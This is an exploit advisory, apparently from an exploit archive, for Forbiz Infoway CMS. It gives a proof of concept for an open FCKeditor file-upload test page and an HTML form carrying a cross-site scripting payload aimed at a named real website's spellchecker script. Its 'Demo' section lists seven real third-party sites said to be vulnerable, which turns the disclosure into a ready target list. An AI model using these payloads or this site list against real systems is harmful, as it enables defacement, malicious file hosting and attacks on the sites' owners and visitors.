Forbiz Infoway CMS - File Upload / Cross Site Scripting

Posted on 30 November -0001
<HTML><HEAD><TITLE>Forbiz Infoway CMS - File Upload / Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>================================================================================
Forbiz Infoway CMS - File Upload / Cross Site Scripting
================================================================================
# Vendor Homepage: http://www.forbiz.co.in/
# Date: 07/10/2016
# Author: Ashiyane Digital Security Team
# Verion: All
================================================================================
# PoC of File Upload (FCKeditor):
Vulnerable page : http://localhost/cms/editor/filemanager/connectors/uploadtest.html
Path of file : http://localhost/images/fck_editor_images/file.txt


# PoC of Xss :
<html>
<form action="http://chakraayurvedicresort.com/cms/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" method="post">
    <input type="hidden" name="textinputs[1</script><script>alert(123);//</script>]" value="test">
    <input type="submit" value="xss">
</form>

# Demo :
http://www.chakraayurvedicresort.com/cms/editor/filemanager/connectors/uploadtest.html
http://www.seshansacademy.com/cms/editor/filemanager/connectors/uploadtest.html
http://aiim.net.in/cms/editor/filemanager/connectors/uploadtest.html
http://www.swiftport.net/cms/editor/filemanager/connectors/uploadtest.html
http://www.hrdcnainital.ac.in/cms/editor/filemanager/connectors/uploadtest.html
http://www.svgmindia.com/cms/editor/filemanager/connectors/uploadtest.html
http://www.attukalshoppingcomplex.com/cms/editor/filemanager/connectors/uploadtest.html 
================================================================================
# Discovered By : M.R.S.L.Y
================================================================================
</BODY></HTML>
TOP
Malware :

None in database
Last 20
Exploits :

Last 20